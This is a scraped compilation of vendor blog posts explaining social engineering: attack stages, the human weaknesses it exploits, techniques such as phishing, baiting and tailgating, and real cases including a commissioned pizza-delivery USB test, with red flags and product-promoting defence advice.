Learn how criminals plan and carry out social engineering attacks, what techniques they use, and what weaknesses they exploit.

Stages of social engineering attacks

Usually, a social engineering attack has five stages:

Cybercriminals must devise the attack, choose the type of social engineering, and find tools to carry it out.

Gather intel

At this stage, cyber criminals mostly use OSINT (open source intelligence) techniques to learn about their targets and victims.

The company’s official website, LinkedIn and other social networking platforms, and employee review websites like Glassdoor are valuable sources of such information.

You can easily learn the address of the company’s offices, the names of the employees, their roles and contact information, and even some internal problems like high employee turnover or bosses that are not used to hearing ‘no.’

This valuable data can be used against your business. This stage can be elaborate, like CEO fraud or spear phishing, or minimal for less personalized attacks.

Establish Contact with the target

At this stage, a criminal contacts one or multiple targets via the chosen medium (email, phone, or in person). The social engineer tries to establish trust and rapport using multiple techniques and to collect the necessary information.

Attack the system

Once the target has given away the information, social engineers begin the penetration of the protected system. It can be a ransomware attack, a login into an account with attempts to steal documents, or transferring money from the victim’s account.

End of the contact

Cybercriminals might choose to end the contact with their target in a way that a target doesn’t suspect foul play. In this case, such a person will not react immediately and take necessary actions (like changing the password, calling a bank, or reporting the attack to the police).

What weakness does social engineering exploit?

Social engineering attacks exploit multiple weaknesses in humans and systems.

The general human weaknesses

First, there are situational weaknesses like work stress or personal issues. Second, certain human physiology and psychological traits make people more susceptible to social engineers:

selective visual attention with a focus, margin, and fringe
cognitive biases (e.g., normalcy bias)
fear of mistake
overconfidence and vanity
gullibility
lack of responsibility.

The business weaknesses

Some institutional problems make employees more susceptible to social engineering attacks. For example:

High levels of stress
Poor planning
Work overload
Toxic corporate culture

For example, a fake email with a credential request from a manager that is excessively judgemental can cause stress in a target. As a result, they might omit the red flags of a social engineering attack. Unfortunately, many businesses turn a blind eye to these issues.

Lack of security awareness training

Security awareness training can significantly increase the ability of employees to spot social engineering attacks. Companies should never underestimate its impact.

Learn more about Cybersecurity Awareness .

IT system weaknesses

Companies that rely solely on human vigilance are likely to fall victim to social engineering attacks. Human error is inevitable in the long run. That’s why your business needs data protection tools that can play the role of the last layer of defense.

Techniques used in social engineering attacks

To exploit the weaknesses of humans, social engineers put extra pressure on the targets by applying the following techniques:

Urgency (for example, in spear phishing or CEO fraud, the criminal might say that some information must be provided ASAP).
Scare tactics (for example, the target is forced to believe that their account has been hacked, and they need to do certain actions like clicking the button in the phishing email to reclaim it).
Authority and conformity (for example, cybercriminals might impersonate governments or law enforcement organizations to create trust and readiness to comply).
Social connections (it’s not necessary to be friends with a target, sometimes, a brief introduction or referring to a mutual ‘acquaintance’ is enough to establish trust).
FOMO or other types of scarcity.

More than one technique can be used. For example, spear phishing attacks often use authority and urgency.

Social engineering attack example

John is an accountant at ABC company producing packaging. One day he receives an email from his boss requesting to transfer a large payment urgently. He’s been very stressed at home because his daughter was sick.

Additionally, John had a falling out with his boss. These stressing factors make him inattentive, and he doesn’t notice that the boss’s name in the email address is misspelled.

There are many types of social engineering attacks. Some complex crime schemes involve using multiple types at the same time.

Phishing attacks are one of the most popular types of social engineering. It uses electronic mail technology to establish contact with a target.

Phishing emails mimic regular messages from a credible sender. Social engineers impersonate banks, SaaS collab tools (like Microsoft 365 or Google Workspace), popular platforms (like Facebook), or even people. The messages have minimal personalization, like the name of a recipient. In some cases, they can even use the standard ‘Dear Sir/Madam.’

Usually, phishing emails request the check of sensitive information, for example, a CVV code of a bank card or credentials.

Once the target has shared the sensitive information, criminals use it to obtain access to money or the IT system and proceed with the crime.

Spear phishing

Spear phishing attacks are similar, only the level of personalization is much higher. That’s why the OSINT stage of these attacks takes much more time.

Usually, spear phishing is carried out against high-profile companies or organizations. The emails might mimic coworkers, partners, or clients.

Whaling CEO fraud

Whaling and CEO fraud are a subtype of spear phishing emails. Cybercriminals impersonate the C-level or the CEO of a company demanding employees to provide some valuable information or complete transfers. This type of attack might even include the Deep Fake.

SMiShing and Vishing

SMSiShing Vishing is similar to phishing attacks. Only the message is sent via text (SMS) or voice mail (hence the V in the name).

A technique used to get into the otherwise secured company office. The criminals follow the authorized personnel to the office. Often, they would start a conversation with a target during lunch or smoking outside the building. They can pretend to forget their card in the office or be an intern.

Once in the office, a cybercriminal can leave a piece of hardware (usually a USB flash) with installed malware in a visible place. The expectation is that an employee takes the bait and connects it to their computer, infecting it.

Cybercriminals can even write something enticing on the hardware (e.g., next year’s promotion candidates) to make it harder to resist the temptation.

Quid pro quo

For many people, it is hard to say no to a person who is prosocial to them. For example, a cybercriminal helps an employee in a cafe and then asks to deliver something to the office for them.

A criminal can make a call or send an email with an offer to help (e.g., arrange an interview with a newspaper for PR purposes). Then they would ask questions that can seem legitimate and secure. Meanwhile, the criminal will use the answers for the attack.

This is a complex social engineering scheme in which the criminal investigates the victim and the target and then creates a pretext to get in contact with the target.

Scareware or Rogue

This attack includes fake malware to make the target believe they’ve been infected and pay for tools that can destroy this software.

Ransomware attack

A ransomware attack is a malware attack that often uses phishing emails to infect IT systems. It decrypts the files on a PC or in cloud offices like Google Workspace or Microsoft 365. Unlike scareware, the infection is real, and decryption is only possible with a special key.

Learn more about Cloud Ransomware .

Diversion Theft

Tricking the delivery service into dropping the goods at the wrong address, where the criminals will be able to get them.

Social Media

It is spear phishing carried out exclusively via social networking websites. Often it uses a honeytrap technique when a target sees an avatar photo of a person who meets current beauty standards.

This section reviews several ways to protect your organization from social engineering attacks. Using just one of them often proves to be insufficient. That’s why we recommend using them as a system of tools.

Red flags of social engineering

Every person should know and remember the red flags of social engineering.

Red flags in personal communication:

the rapid decrease in the distance (a person you just met behaves as if you’re good acquaintances), attempts to penetrate your boundaries
increased charm
emotional manipulation (fear, urgency, guilt)
an internal feeling of confusion

Red flags of phishing emails:

the name of the sender in the email is miswritten, especially if it is a long name (e.g., [email protected] instead of Anastasia)
the domain is miswritten (e.g., [email protected])
the unusual top-level domain (e.g., [email protected] instead of .ai)
an unusual style of email if you know the sender (e.g., your colleague always uses cheers at the end of the letter)
unusual time of an email
emotional manipulation (fear, urgency, greed)
request to provide sensitive information
call to click on a link
unusual URL of the link (too long, misspelling at any level of a domain, e.g., gooogle.com)
Grammatical mistakes*

* It was a significant sign in the past. However, with the popularisation of spellcheckers and the ability of criminals to learn from their mistakes, fewer phishing emails have this red flag.

Security awareness training

Security awareness training is essential for a company’s cybersecurity. Remember the following principles that will guarantee its efficiency:

it should be part of your onboarding process
it should be regular and permanent (e.g., every six months)
it should be available for different types of learning (audio, video, text)
it should encompass penetration tests (e.g., fake attacks).

Data Control tech stack

The data control tech stack helps your IT team monitor your IT environment for possible unauthorized data access and sharing of sensitive information. Solutions like SpinOne SSPM provide a single pane of glass for all these functions:

AI-based detection of abnormal logins

If your employee falls victim to social engineering and gives up their credentials, your IT team can spot this if they have a tool that detects abnormal logins.

For example, your company operates in the US, and the login has been done in Australia. Or, for example, your employees work within one or two time zones. And you spotted the login in unusual hours (3 AM your time).

AI-based monitoring of abnormal data behavior

Another possible sign that your system has been hacked is abnormal data behavior, e.g., the download of a large volume of data at once.

Data sharing control

A subtle way to get access to the data without being spotted is quickly changing its sharing settings. For example, a cybercriminal finds sensitive information and shares it with a third party.

To fix it, you need a tool able to detect the unwanted sharing settings and enable you to change them to the preferable ones.

Detecting emails with PII

Often the targets of social engineering will send PII upon the request of cyber criminals.

Ransomware Protection

Some ransomware protection tools have proven to be efficient in battling not only ransomware but also its most unwanted outcome – downtime. However, you need to be careful when choosing this type of solution.

Most ransomware protection tools would wait till the end of a ransomware attack and then restore data from the backup. When it comes to cloud ransomware and large corporations, the recovery from backup can take weeks and even months.

Cloud collab environments like Google Workspace and Microsoft 365 have API limitations that will make the recovery process exceptionally long.

That’s why you need tools that detect ransomware attacks early on. immediately terminate it and start the recovery process.

Solutions like SpinOne can reduce downtime by up to 99%: from a month to several hours.

Protect your data from social engineering with SpinOne

SpinOne is a SaaS Security Posture Management Platform that can help organizations protect their data stored in cloud environments of Google Workspace and Microsoft 365.

SpinOne is an AI-based application able to detect ransomware and unauthorized access to your cloud data. It can become the last layer of defense for your company in case of a phishing attack.

Was this helpful?

Written by Nick Harrahill

Nick Harrahill is the Director of Support at Spin.AI, where he leads customer support, success, and engagement processes .

He is an experienced cybersecurity and business leader. Nick’s industry experience includes leading security teams at enterprise companies (PayPal, eBay) as well as building programs, processes, and operations at cyber security start-ups (Synack, Elevate Security, and Spin.AI).

Credentialed in both cyber security (CISSP) and privacy (CIPP/US), Nick has managed teams focused on vulnerability management, application security, third-party risk, insider threat, incident response, privacy, and various facets of security operations.

In his spare time, Nick enjoys trail running and competing in ultra-marathons, camping, hiking, and enjoying the outdoors.

Ransomware in the Cloud: Challenges and Best Practices

How Can You Maximize SaaS Security Benefits?

Let's get started with a live demo

Schedule a Demo Call

Latest blog posts

Microsoft 365

Microsoft 365 Backup vs. 3rd Party Cloud Backup

As organizations increasingly adopt and become dependent on cloud-based services like Microsoft 365 to run...

Davit Asatryan

Vice President of Product

SaaS Backup and Recovery

Best SaaS Ransomware Protection Solutions for 2024

Ransomware reached record highs in 2023, and trends have had no problem carrying over into...

Dmitry Dontov

CEO and Founder

Disney’s Slack Data Breach: Lessons for Enterprise SaaS Secur...

Recently, Disney was the target of a high-profile breach in which a hacker group was...

William Tran

Product Manager

The “Pizza” method – a social engineering Case Study

‘Eight pizza delivery boxes with 30% discount and a free gadget for the computer’. Hackers posing as pizza delivery carried on a successful social engineering attack on the Warsaw branch office of a well-known international corporation. In a few minutes, they hacked the IT system – effectively paralyzing the operations of the whole company.

In just Poland alone, every year about 20% of all Internet users face phishing attacks. The targets are, apart from banking and payment system users, Internet shop e-customers. This proves that the main target of the hackers is our money (the data by Kaspersky Lab). In any case, the hacker’s ‘business’ pays off, because according to Nest Bank information, as many as 30% of all Poles do not know what phishing is, while 32% feel that they know, even though they are not sure.

At the same time, the number of whaling attacks is still growing. ‘Whaling’ is more precise and sophisticated phishing that targets governmental institutions and large businesses. As the authors of the Verizon DBIR 2019 report state, today, high-ranking managers and company managers (that is the persons who have executive privileges and access to many reserved, sometimes critical IT infrastructure areas) are 12 times more exposed to attacks utilizing social engineering than only a year ago.

TestArmy CyberForces Pizza Day Social Engineering attack

The most expensive pizza in history

Hackers use different methods to affect the theft of data important to them. This data includes, i.e., access data to bank accounts, PIN numbers or credit card CVC numbers, detailed personal data or – in the case of whaling – sensitive company data. Still the major, yet not the only vector of a cyberattack are e-mails, and one of the most popular forms are attacks using social engineering – that is attacks that are based on the human predisposition to unconsciously submit to outside influence. The directors and employees of a well-known, international corporation found this out when its Warsaw branch was attacked by hackers using the “pizza” method . Even though the company had a hardware and software security system of top world level, the cybercriminals managed to find a hole in it. How did the attack come about?

Information was sent to the e-mail addresses given on our internet site about the opening of a new pizza parlour in the vicinity and that there would be a 30% discount for the first few customers. Employees tempted by this offer quickly organized a “Pizza Day” and ordered eight boxes. The menu was on the www page of the pizza parlour, which later proved to be fake and had been created just to authenticate the existence of the new spot – ‘Adam’, the CEO of the attacked company ruefully admits (due to security reasons the name of the company is not disclosed).

What happened next?

After a few dozen minutes, a pizza deliveryman appeared with the pizza and a free gift in the form of USB plugged LED lamps that changed colours to the rhythm of the music. Nicely surprised with the gift, the employees immediately plugged them into their computers. They were unaware that in this way they gave the hackers remote access to the company’s computer infrastructure and they destabilised the operation of the whole system, and, consequently, of the entire company in just a few minutes.

How is it possible that a company featuring security at the top level could fall victim to the efforts of cybercriminals? The weakest, least predictable and at the same time most susceptible link failed, i.e. human beings – in this case, people unaware of the risk and incorrectly trained in cybersecurity – the employees of the company.

TestArmy CyberForces was behind the attack

Luckily for the employees, the “pizza” method attack proved to be a planned in advance, security system audit that was to reveal where the company was still at risk. As Szymon Chruścicki from TestArmy CyberForces, who on the order of the corporation had prepared the scenario of the attack and performed the social engineering test, states:

The attack scenario was based on a few simple steps. We started from creating a fake www site and then we ordered stickers with the name and logo of the pizza parlour. We used service e-mail addresses indicated on the web site of the attacked corporation. After receiving an order from the employees, our employee delivered pizzas bought from a local pizzeria, having stuck on the box containers, the logo of our fake one. We used the rule of reciprocity and sympathy to get the employees to undertake the planned action, in this case, it was connecting to their computers, lamps in which we had mounted prepared flash memory sticks containing malware. Outside the building, our specialist of cybersecurity waited, and as soon as he gained remote access to the hardware, he was able to encrypt all the data in the company system.

What was all this activity for? Let’s remember that the security system is as efficient as its weakest link, and for this reason alone, social engineering attacks are one of the most effective methods used by hackers. Simulations with the use of malware are necessary in order to fully understand the character of these hazards. On the one hand, they allow the discovery of holes in the security systems, and on the other hand, they train employees how not to become victims of the social engineering tricks used by cyber-crime hackers.

Famed examples from a few last months

There are multiple examples of effectively performed attacks using social engineering. To name just a few:

A few million Polish zlotych was lost by the Cenzin company, which belongs to the Polish Armaments Group after cyber-crime hackers posed as a weapon supplier from the Czech Republic. The employees did not verify the information sent by e-mail concerning changes of an account number to which Cenzin paid money for the purchased goods. Because of this, the financial transaction ended up in the hacker’s account.
Personal details of 20 thousand FBI employees and 9 thousand employees of the United States Department of Homeland Security were leaked after a hacker posing a new employee called the Justice Department asking to give him the access code to the restricted web pages of the institution. As a result, he received access to an internal network that included the mail addresses of government personnel and information concerning their credit card numbers.
One of the American banks suffered great corporate image loss after hackers broke into its mailing system. On being refused payment of a ransom, they commenced sending millions of spam mail. Due to this, the web service provider was forced to switch off the electronic mail service of the bank.
Hackers earned over 500 thousand dollars in 2018 using so-called “sextortion scams”, i.e. sending blackmail messages (usually from the address belonging to the victims) with a threat to make public, compromising films or photos of the victim that were allegedly in their possession, if the hacker did not receive the requested amount of money (the data by GlobalSign).

How to protect oneself against hackers? TOP 4 hints

Report and then remove all messages asking for personal details, logins and passwords. Mail like this is likely fraudulent.
Verify the e-mail senders before you send them the requested files or before you perform the requested activity. Do this not once, or twice but three times.
Set at high, the spam filters of your electronic mail.
Update your anti-virus software regularly and visit only safe web sites.

As Szymon Chruścicki, the cybersecurity expert of the TestArmy CyberForces sums up:

Let’s be watchful and cautious. Let’s invest in employee training and warn them continuously of opening unverified emails and attachments from unknown senders. If anything raises doubts, let’s report it to the company IT department. These are very simple actions that can protect the easiest thing that can be manipulated by hackers – human vigilance.

As the only plus that can be pointed out, we in Poland are not the main target of cyber-crime hackers. According to the data of Kaspersky Lab, the largest percentage of phishing attack victims live in Brazil, Australia, Spain and Portugal. Poland, at the level of 10.2%, is located more or less in the middle of the list.

If you’re looking for protection from social engineering attacks check our social engineering service . Contact us and we’ll perform a complex test and perform workshops with your employees.

Cyber Security Training & Software for Companies | MetaCompliance

Discover our suite of personalised Security Awareness Training solutions, designed to empower and educate your team against modern cyber threats. From policy management to phishing simulations, our platform equips your workforce with the knowledge and skills needed to safeguard your organisation.

Cyber Security eLearning to Explore our Award-Winning eLearning Library, Tailored for Every Department

Schedule Your Annual Awareness Campaign In A Few Clicks

Stop Phishing Attacks In Their Tracks With Award-Winning Phishing Software

Centralise Your Policies In One Place And Effortlessly Manage Policy Lifecycles

Control, Monitor, and Manage Compliance with Ease

Take Control Of Internal Incidents And Remediate What Matters

Explore the versatility of our solutions across diverse industries. From the dynamic tech sector to healthcare, delve into how our solutions are making waves across multiple sectors.  

Creating A First Line Of Defence For Financial Service Organisations

A Go-To Security Awareness Solution For Governments

A Security Awareness Training Solution For Large Enterprises

Embed A Culture Of Security Awareness - Even At Home

Engaging Security Awareness Training For The Education Sector

See Our Tailored Security Awareness For Healthcare Workers

Transforming Security Awareness Training In The Tech Industry

Support Your Nis2 Compliance Requirements With Cyber Security Awareness Initiatives

From posters and policies to ultimate guides and case studies, our free awareness assets can be used to help improve cyber security awareness within your organisation.

An Indispensable Resource For Creating A Culture Of Cyber Awareness

The Ultimate Guide To Implementing Effective Cyber Security Elearning

Educate Employees About How To Detect And Prevent Phishing Attacks

Download These Complimentary Posters To Enhance Employee Vigilance

Create A Security-Conscious Culture And Promote Awareness Of Cyber Security Threats

Hear How We’re Helping Our Customers Drive Positive Behaviour In Their Organisations

A Glossary Of Must-Know Cyber Security Terms

Audit Your Awareness Training And Benchmark Your Organisation Against Best Practice

Download Our Free Awareness Assets To Improve Cyber Security Awareness In Your Organisation

MetaCompliance | Cyber Security Training & Software for Employees

With 18+ years of experience in the Cyber Security and Compliance market, MetaCompliance provides an innovative solution for staff information security awareness and incident management automation. The MetaCompliance platform was created to meet customer needs for a single, comprehensive solution to manage the people risks surrounding Cyber Security, Data Protection and Compliance.

Learn Why Metacompliance Is The Trusted Partner For Security Awareness Training

We Make It Easier To Engage Employees And Create a Culture of Cyber Awareness

Easily Automate Security Awareness Training, Phishing And Policies In Minutes

Meet the MetaCompliance Leadership Team

Stay informed about cyber awareness training topics and mitigate risk in your organisation.

5 Examples Of Social Engineering Attacks: Learn How Social Engineers Trick Their Way In

Luke noonan.

Phishing and Ransomware

5 Examples Of Social Engineering Attacks

about the author

Share this post

Explore in the article five famous examples of social engineering attacks and discover how these tactics deceive individuals. Humans are inherently social beings, enjoying mingling, communication, work, and shared activities. This sociability, rooted in trust, facilitates cooperation and coexistence within human groups.

However, these very social traits are also exploited by cybercriminals aiming to cause harm. Social engineering attacks capitalize on these vulnerabilities, employing deception and impersonation to manipulate individuals into actions that serve the scammer’s agenda.

This is borne out by the 2023 Verizon Data Breach Investigations Report (DBIR) , which found that 82% of breaches involve a human element.

Here is a look at how social engineering attacks happen and what you can do to prevent your staff from being socially engineered.

How Do Social Engineering Attacks Happen?

According to a recent report, the average organisation experiences 700 social engineering attacks per year. Social engineering attacks come in many forms and evolve into new ones to evade detection.

The remit of a social engineering attack is to get someone to do something that benefits a cybercriminal. For example, trick a person into revealing financial details that are then used to carry out fraud.

Social engineering is not just carried out using digital methods. Social engineers will turn to any tactic to build the structures needed to trick people. This can include using the telephone or walking into an office and chatting with the staff.

Current favourite social engineering tricks include:

Pretexting and tailgating : attackers will pretend to be a co-worker or person in authority, e.g., a police officer. They will use this guise to establish trust with a target via a digital method, phone, or in person. Once trust is established, the scammer will attempt to extract information, such as personal data or financial details.

In addition, tailgators often carry out physical attacks on companies, finding ways to enter a building, slipping in unnoticed or even invited. Once inside a building, they can use readily available tools, such as RubberDucky USB used by legitimate penetration testers, to steal data, including login credentials.

Phishing : phishing comes in various flavours, including email, phone calls, social media posts, and text messages. Phishing attack messages encapsulate social engineering tactics, using pretense, trust, and the urge to click to encourage recipients to divulge personal information, such as passwords and credit card details.

A UK Gov study into cyber security found that the vast majority (83%) of businesses who identified a cyber attack said that phishing was the primary vector of the attack.

Spearphishing is the targeted form of phishing that takes social engineering to the greatest heights of success. Spearphishing emails are hard to differentiate from legitimate emails because scammers go to great lengths to make them look realistic, often forming trusted relationships with their target. Spearphishing is behind 93% of cyber attacks, according to the 2018 DBIR.

Baiting : this social engineering attack uses enticement or fear of missing out (FOMO) to encourage certain behaviours. For example, an employee may be offered free gifts if they provide personal or company information or passwords.

Why Are Social Engineering Attacks Effective?

Human beings have evolved to act and behave in certain ways to establish strong and cohesive social structures. Elements such as trust are vital components of coherent societies. Without trust, relationships fail.

Scammers understand human behaviour and the need to build trusted relationships. They also understand how to manipulate people by pretending to be a trusted person or building trust.

Other human behaviours such as the urge to do a good job, not get into trouble, or not miss out on a good thing are also abused by cybercriminals. All these natural actions we carry out daily in our home and work lives are open to exploitation by cybercriminals intent on stealing data and accessing networks to carry out malicious acts.

5 Examples of Social Engineering Attacks

Examples of social engineering are regularly in the press, but here are five to give you a flavour of how social engineering works:

Marriott Hotel: a hacking group used social engineering tactics to steal 20 GB of personal and financial data from a Marriott Hotel . The hackers tricked a Marriott Hotel associate into giving the hacking gang access to the associate’s computer.

US Department of Labor (DoL) : this involved a socially engineered attack stealing Office 365 login credentials. The attack used sophisticated phishing based on cleverly spoofed domains that looked just like the legitimate DoL domain. The emails seemed to be from a senior DoL employee inviting them to submit a bid for a government project. Clicking the bid button took the employee to a phishing site used to steal credentials.

Zoom users : a phishing campaign targeting employees affected at least 50,000 users. The social engineers used fear of redundancy to encourage employees to click a link to meet with HR over Zoom. Clicking on the link took the employee to a fake Zoom login site designed to steal passwords.

FACC (Austrian aircraft manufacturer): FACC lost around 42 million euros when the company became a victim of a sophisticated Business Email Compromise (BEC) scam. The CEO of the company had his email account spoofed and then used to send an ‘urgent’ email request for a funds transfer. This email tricked an account payable employee who accommodated the request, paying the money into the scammer’s account.

Crowdstrike callback : even security vendors are feeling the force of social engineering. Crowdstrike has become an unwitting pawn in the social engineer’s game. Scammers are using the trusted brand of Crowdstrike and other security vendors to send phishing emails to employees. The email contains details of a possible malware infection and a phone number to call to remove the installed malware. If the employee reaches the number, they are tricked into giving the attacker access to their computer.

How to protect against social engineering attacks

Social engineering is successful because the technique manipulates our everyday actions. This makes it difficult for employees to spot that they are part of a social engineering attack.

Social engineering needs to be part of the conversation around security awareness, and security policies should reflect this. However, there are practical ways to ensure that employees are up to speed with the tricks that social engineering scammers play:

Make social engineering part of your security culture:

Engage staff in regular updates on social engineering and how it works.
Make sure that social engineering is part of your regular Security Awareness Training.
Include social engineering in security awareness month posters and send newsletters to staff about the issues caused by social engineering.

Deploy phishing simulations : use an advanced simulated phishing platform to train staff on what phishing emails look like and to test their response to a phishing email. Tailor these emails to different roles in your organisation and base the simulations on known tactics used by scammers.

Penetration test your company and staff: set up various test scenarios to see how well staff respond to potential social engineering attempts. This can include tests to see how easy (or hard) it is to gain entry to the building.

Also, test out staff and their response to unknown individuals. For example, pose testers as cleaners or contractors and see how far they can get in extracting information about your company or asking for access to a computer.

5 Examples Of Social Engineering Attacks: Learn How Social Engineers Trick Their Way In

Cyber Security Hygiene: Practices to Reduce Human Risk

Mastering Incident Management: Key Steps for an Effective Cyber Security Response

Request a demo.

Request a free demo today and see how our world-class cyber Security Awareness Training could benefit your organisation.

The demo only takes 30 minutes of your time and you don’t need to install any software.

Request Demo - Master

Request Demo - Header Test

All fields are required. Please use your corporate email address.

Find out how we keep your data safe – read our privacy policy

The demo only takes 30 minutes of your time and you don’t need to install any software.

Find out how we keep your data safe – read our privacy policy .

IEEE Account

Change Username/Password
Update Address

Purchase Details

Payment Options
Order History
View Purchased Documents

Profile Information

Communications Preferences
Profession and Education
Technical Interests
US & Canada: +1 800 678 4333
Worldwide: +1 732 981 0060
Contact & Support
About IEEE Xplore
Accessibility
Terms of Use
Nondiscrimination Policy
Privacy & Opting Out of Cookies

A not-for-profit organization, IEEE is the world's largest technical professional organization dedicated to advancing technology for the benefit of humanity. © Copyright 2024 IEEE - All rights reserved. Use of this web site signifies your agreement to the terms and conditions.

PENETRATION TESTING
COMPUTER FORENSICS
CORPORATE RESPONSIBILITY
SPONSORSHIPS

The Most Famous Cases of Social Engineering

March 28, 2017
Cyber security advice

In 2007, one of the most expensive security systems in the world was breached. To do this, weapons, violence or electronic devices weren’t needed. A man took 28 million dollars in diamonds from the ABM AMRO bank , based in Belgium, by being a charming person. Obviously, this kind of weapon can’t be bought.

The guy, who called himself Carlos Héctor Flomenbaum, had an Argentinian passport which had been stolen in Israel. With his new identity, he gained the employees’ confidence at the bank over a year. While he was painting himself as a successful businessman, the thief was friendly with the bank workers by giving them chocolate boxes. One day, they provided access to him the security boxes which contained gems valued at 120,000 carats. Then, it became one of the biggest robberies committed by only one person.

The moral of this story is simple: no matter which kind of technology is provided, or how expensive it is, while the human factor is operating, the system is still vulnerable .

The user is the weakest link in security

The previous chronicle is a good beginning to talk about social engineering. A set of psychological techniques and social skills which, used consciously and premeditatedly, allow data to be stolen . What a social engineer does with the information they have gathered hasn’t got limits, although that no longer belongs to social engineering. That is why, as far as the computing world is concerned, it’s possible that a social engineer would never touch a computer or access any system.

In some cases, a social engineer does not have to gain the confidence of his or her victims, or manipulate them, as he or she can obtain data by paying attention to the information which is in view of everybody. It could be a post it on a desktop, notes of a notebook, messages that appear on a mobile screen, or even looking for data in the trash (a method known as trashing). In other words, a social engineer can get data without applying any pressure on people . In these cases, we would not be talking about a scam technique, but taking advantage of carelessness.

In the previous example, it is clear that the goal of the robbery was the gems, but it also shows us that the most important asset of any company is still information. Possibly, the thief would not have known things like where the diamonds were if the employees had not given him this information . This is the main reason why businesses should invest in system protection, but also training their workers to prevent what could happen.

We should not forget that social engineering is still one of the most used techniques among cybercriminals. This is not surprising as they have earned a billion dollars in the last two years by stealing from a hundred of banks.

The following cases demonstrate to us how the human factor can influence a company’s profits , and also, how it could affect the state of the main markets. You will see two examples that are worth bearing in mind when a company decides to invest in improving its computer security.

Ubiquiti Networks case and reverse social engineering

The Ubiquiti Networks is an American service provider of high-performance networks for businesses. In 2015 it was hit by a cyberattack that made it lose 39.1 million dollars. For that purpose, cybercriminals wrote some e-mails introducing themselves as executive members of the company. They asked some employees of the financial area to transfer big amounts of money to a particular bank account which was controlled by the cybercriminals.

This social engineering technique takes advantage of certain human being’s weaknesses , like being helpful, since this could be recognized by superiors. Also, there are a lot of people who are incapable of refusing to do something that, thought about coldly, could be harmful.

No one entered into the computer systems of the Ubiquiti Networks and no data was stolen. In this case, the security breach was the employees, they lacked cybersecurity training, and they were unaware of the necessary procedures to face these kinds of frauds.

The influence of a fake tweet in the world economy

There are people who probably have forgot the next case. In April 2013 the Associated Press Twitter account published a tweet which damaged the world economy for a short time:

At that time, the social network didn’t have double-factor authentication for logging on. The Syrian Electronic Army, the group who claimed responsibility for the attack, took the Twitter account by sending a phishing e-mail to some members of the Associated Press. Someone took the bait and gave the login information to the hackers. In the next image, you will see the phishing e-mail which was sent to Associated Press:

The outcome is well known: the White House denied the tweet, and the Associated Press account was temporally suspended until the staff members restored control. The markets soon recovered their original levels.

This situation shows us how weak we are facing this kind of cyberattack , and as a consequence, how vulnerable companies and organizations of any size are. This time it was the Associated Press, but tomorrow it may be any business or institution that could send harmful messages by social networks that could damage their reputation, and hence, their customer and investors confidence.

The relevance of taking action and reporting

In a TED Talks, the vice president at IBM Security, Caleb Barlow urges companies all over the world to fight against cybercrime in the same way action protocols are performed in a public health crisis. As we have seen in the 2009 flu pandemic and the Zika virus, governments and organizations of every country shared information instantly about the number of people affected and how these viruses were spreading.

This pathway is opposite of what is being done today in relation to computer attacks. Taking a look at the number of daily cyberattacks, we don’t have enough data about how many companies have been breached. The reason is fear, this information could impact on their name and also, on their finances. “If we do not share it [information], then we are part of the problem”, says Barlow.

Latest Posts

The keys to get the ISO 27001 certification - November 14, 2019
Managed Security Service – MSSP - October 23, 2019
DDoS Attacks – An In-Depth Guide - September 12, 2019

Comments are closed.

10 real and famous cases of social engineering attacks

Table of Contents

Check out 10 social engineering attacks

2. Toyota, 2019

3. Cabarrus County, 2018

4. Ethereum Classic, 2017

5. Democratic Party, 2016

6. Ubiquiti Networks, 2015

7. Sony Pictures, 2014

8. Target, 2013

9. South Carolina Department of Revenue, 2012

10. RSA, 2011

How to prevent social engineering incidents

10 real and famous cases of BEC (Business Email Compromise)

8 reasons to use DMARC in your business

What is mail server?

15 Examples of Real Social Engineering Attacks

1. $100 Million Google and Facebook Spear Phishing Scam

2. Persuasive email phishing attack imitates US Department of Labor

3. Russian hacking group targets Ukraine with spear phishing

4. Deepfake Attack on UK Energy Company

5. $60 Million CEO Fraud Lands CEO In Court

6. Microsoft 365 phishing scam steals user credentials

7. Singapore bank phishing saga like ‘fighting a war’

8. Ransomware gang hijacks victim’s email account

9. Phishing scam uses HTML tables to evade traditional email security

10. Sacramento phishing attack exposes health information

11. Google Drive collaboration scam

12. Sharepoint phishing fraud targets home workers

13. $75 Million Belgian Bank Whaling Attack

14. High-Profile Twitters Users’ Accounts Compromised After Vishing Scam

15. Texas Attorney-General Warns of Delivery Company Smishing Scam

Prevent social engineering attacks in your organization

Related Posts

Attackers are Using Microsoft Forms to Exfiltrate Data

Why Financial Services Firms are Most Likely to Fall for Phishing Attacks

Phishing 101: What is Phishing?

Hacker’s Advice: 7 Tips for Avoiding Phishing Scams

5 Examples of Top Social Engineering Attacks

5 Top Social Engineering Attacks

Social Engineering Attack Lesson Learned

2. 2020 Twitter Bitcoin Scam

3. 2022 Attack on Uber

4. 2022 Attack on Rockstar Games

5. 2022 Attack on Twilio

Don’t Become a Victim of a Social Engineering Attack

Latest Posts

Celebrating National Social Engineering Day

The Growth of Third-Party Software Supply Chain Cyber Attacks

Bypassing Key Card Access: Shoring Up Your Physical Security

15 Examples of Social Engineering Attacks

Social Engineering Examples

1. Kevin Mitnick's Early Career

2. Spear Phishing Attack on the Democratic National Committee

3. Bangladesh Bank Heist

4. Sony Pictures Hack

5. Twitter Bitcoin Scam

6. NotPetya

7. Target Data Breach

8. Anthem Data Breach

9. Evaldas Rimasauskas Wire Fraud

10. AI Deepfake Scam Hits UK Energy Firm

11. Google Drive Scam

12. Reveton

13. The Lapsus$ Hacking Group

14. Barbara Corcoran Phishing Incident

15. Cabarrus County Hack

What Is Social Engineering? Examples & How To Prevent It

What Is Social Engineering?

Why Is Social Engineering Dangerous?

Types of Social Engineering Attacks

Real-World Examples of Social Engineering

What Makes You Vulnerable to Social Engineering?

Typical Targets of Social Engineering Attacks

How To Recognise a Social Engineering Attack

How To Prevent Social Engineering Attacks

Evolving Trends in Social Engineering

Stay One Step Ahead With Living Security

The 13 Most Common Types of Social Engineering Attacks + How to Defend Against Them

Clone phishing